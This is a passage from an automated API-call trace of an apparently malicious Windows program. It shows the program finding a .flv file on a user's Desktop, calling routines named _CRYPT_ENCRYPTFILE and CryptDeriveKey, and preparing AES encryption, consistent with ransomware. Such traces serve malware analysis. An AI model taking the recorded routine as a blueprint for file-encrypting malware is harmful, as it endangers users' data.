cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0167.720] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.720] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0167.720] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.720] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0167.720] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0167.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.720] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.720] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.720] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x33873000, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 0x90add8 [0167.722] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0167.722] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.722] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x33873000, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 0x90add8 [0167.722] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0167.722] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TtEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tEAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EAhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AhK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hK_e6.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0167.726] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.726] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0167.726] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.726] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.726] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.726] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.726] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.726] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0167.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.727] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x33873000, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 0x90af58 [0167.727] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0167.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.727] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.727] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.728] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0167.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.728] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0167.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0167.728] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.728] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.728] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0167.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.728] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0167.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.729] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0167.729] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.730] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.730] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.730] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0167.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.730] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.730] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.730] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.730] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.730] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.730] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.731] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.731] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.731] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.731] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.731] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.731] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.731] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.731] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.732] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.732] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.732] RtlAllocateHeap 